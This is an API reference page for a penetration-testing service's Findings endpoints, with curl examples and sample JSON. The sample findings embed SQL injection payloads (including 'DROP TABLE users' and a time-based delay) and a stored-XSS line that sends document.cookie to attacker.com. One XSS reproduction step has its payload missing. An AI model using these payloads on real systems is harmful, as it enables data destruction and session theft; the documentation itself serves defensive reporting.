Findings API - apviso [APVISO](/)Product

Resources

Developers

Company

[Pricing](/#pricing)[Partners](/partners)[Enterprise](/enterprise)

[Login](/login)[Start free pentest](/register?intent=free-local-pentest)

[Login](/login)[Start free](/register?intent=free-local-pentest)

[Home](/)[Knowledge Base](/docs)[API Reference](/docs/api)FindingsFindings
========

View and manage vulnerability findings

GET`/v1/scans/:scanId/findings`

### List findings for a pentest

Retrieve a paginated list of vulnerability findings discovered during a pentest. Findings can be filtered by severity level and user-assigned status. Results are ordered by severity (critical first) then by position.

#### Path Parameters

NameTypeDescription`scanId`required

`string`Pentest ID (UUIDv7)

#### Query Parameters

NameTypeDescription`page`

`number`Default: `1`

Page number for pagination`limit`

`number`Default: `20`

Number of results per page (max 100)`severity`

`string`criticalhighmediumlowinfo

Filter by severity level`userStatus`

`string`openin\_progressfixedaccepted\_riskfalse\_positive

Filter by user-assigned status

#### Example Request

bashCopy

```
curl -X GET "https://apviso.com/api/v1/scans/:scanId/findings" \
  -H "X-API-Key: apvk_your_key_here"
```

#### Response

Returns a paginated list of findings with full vulnerability details including CVSS scoring, CWE classification, evidence, reproduction steps, and remediation guidance.

jsonCopy

```
{
  "findings": [
    {
      "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "SQL Injection in /api/users endpoint",
      "severity": "critical",
      "cvssScore": 9.8,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "cweId": "CWE-89",
      "description": "The /api/users endpoint is vulnerable to SQL injection through the `sort` query parameter. An unauthenticated attacker can extract the full database contents, modify data, or execute operating system commands.",
      "evidence": "GET /api/users?sort=name%27%3B+DROP+TABLE+users%3B-- returned a 500 error with SQL error details in the response body.",
      "reproduction": [
        "Send a GET request to /api/users?sort=name' OR 1=1--",
        "Observe the response returns all user records regardless of authorization",
        "Confirm with time-based payload: /api/users?sort=name'; WAITFOR DELAY '0:0:5'--"
      ],
      "remediation": "Use parameterized queries or an ORM for all database operations. Validate and sanitize the `sort` parameter against an allowlist of column names.",
      "affectedUrl": "https://example.com/api/users",
      "agent": "pentester",
      "userStatus": "open",
      "position": 1,
      "createdAt": "2026-04-10T10:45:18Z",
      "updatedAt": "2026-04-10T10:45:18Z"
    },
    {
      "id": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "Cross-Site Scripting (Stored XSS) in user profile",
      "severity": "high",
      "cvssScore": 8.1,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "cweId": "CWE-79",
      "description": "The user profile bio field does not sanitize HTML input. Stored XSS payloads execute in the context of any user viewing the profile, enabling session hijacking and account takeover.",
      "evidence": "Setting the bio field to fetch(\"https://attacker.com/steal?c=\"+document.cookie) results in script execution when the profile is viewed.",
      "reproduction": [
        "Navigate to /settings/profile",
        "Enter  in the bio field",
        "Save the profile and view it in another browser session",
        "Observe the JavaScript alert fires with the domain"
      ],
      "remediation": "Sanitize all user-generated HTML content using a library like DOMPurify. Implement Content-Security-Policy headers to mitigate impact.",
      "affectedUrl": "https://example.com/settings/profile",
      "agent": "pentester",
      "userStatus": "open",
      "position": 2,
      "createdAt": "2026-04-10T10:48:33Z",
      "updatedAt": "2026-04-10T10:48:33Z"
    }
  ],
  "total": 21,
  "page": 1,
  "limit": 20,
  "totalPages": 2
}
```

PATCH`/v1/scans/:scanId/findings/:findingId/status`

### Update finding status

Update the user-assigned status of a finding. Use this to track your remediation progress. Status changes are reflected in compliance posture calculations and report generation.

#### Path Parameters

NameTypeDescription`scanId`required

`string`Pentest ID (UUIDv7)`findingId`required

`string`Finding ID (UUIDv7)

#### Request Body

NameTypeDescription`userStatus`required

`string`openin\_progressfixedaccepted\_riskfalse\_positive

New status for the finding

#### Example Request

bashCopy

```
curl -X PATCH "https://apviso.com/api/v1/scans/:scanId/findings/:findingId/status" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "userStatus": "in_progress"
}'
```

#### Response

Returns the updated finding.

jsonCopy

```
{
  "finding": {
    "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
    "userStatus": "in_progress",
    "updatedAt": "2026-05-03T15:22:08Z"
  }
}
```

PATCH`/v1/scans/:scanId/findings/reorder`

### Reorder findings

Update the display order of findings within a pentest. Use this to customize the priority ordering in your reports and dashboard views. Positions are zero-indexed integers.

#### Path Parameters

NameTypeDescription`scanId`required

`string`Pentest ID (UUIDv7)

#### Request Body

NameTypeDescription`positions`required

`array`Array of objects with `findingId` (string) and `position` (number) specifying the new order

#### Example Request

bashCopy

```
curl -X PATCH "https://apviso.com/api/v1/scans/:scanId/findings/reorder" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "positions": [
    {
      "findingId": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "position": 0
    },
    {
      "findingId": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "position": 1
    },
    {
      "findingId": "019414ca-c3d4-7e5f-a6b7-8c9d0e1f2a3b",
      "position": 2
    }
  ]
}'
```

#### Response

Returns success=true after applying the new finding positions.

jsonCopy

```
{
  "success": true
}
```

[Back to API Reference](/docs/api)

[Overview](#overview)[GET /v1/scans/:scanId/findings](#list-findings)[PATCH /v1/scans/:scanId/findings/:findingId/status](#update-finding-status)[PATCH /v1/scans/:scanId/findings/reorder](#reorder-findings)

[APVISO](/)Autonomous AI-powered penetration testing for modern web applications.

Subscribe

[](https://github.com/apviso)[](https://x.com/Apviso_com)[](https://www.linkedin.com/company/apviso/)

[![Featured on Good AI Tools](https://goodaitools.com/assets/images/badge.png)](https://goodaitools.com/ai/apviso)

Product

- [Features](/#features)
- [Pricing](/pricing)
- [Integrations](/integrations)
- [Benchmarks](/#compare)
- [Affiliate Program](/affiliate)
- [Partners](/partners)
- [Enterprise](/enterprise)

Resources

- [Blog](/blog)
- [Use Cases](/use-cases)
- [Glossary](/glossary)
- [Comparisons](/comparisons)
- [Alternatives](/alternatives)
- [Compliance](/compliance)
- [Vulnerabilities](/vulnerabilities)
- [Industries](/industries)
- [OWASP APTS](/trust/apts)

Developers

- [Knowledge Base](/docs)
- [API Reference](/docs/api)
- [MCP Server](/docs/mcp)

Company

- [About](/about)
- [Contact](/contact)
- [Status](https://status.apviso.com)
- [Privacy Policy](/legal/privacy)
- [Terms of Service](/legal/terms)

© 2026 APVISO. All rights reserved.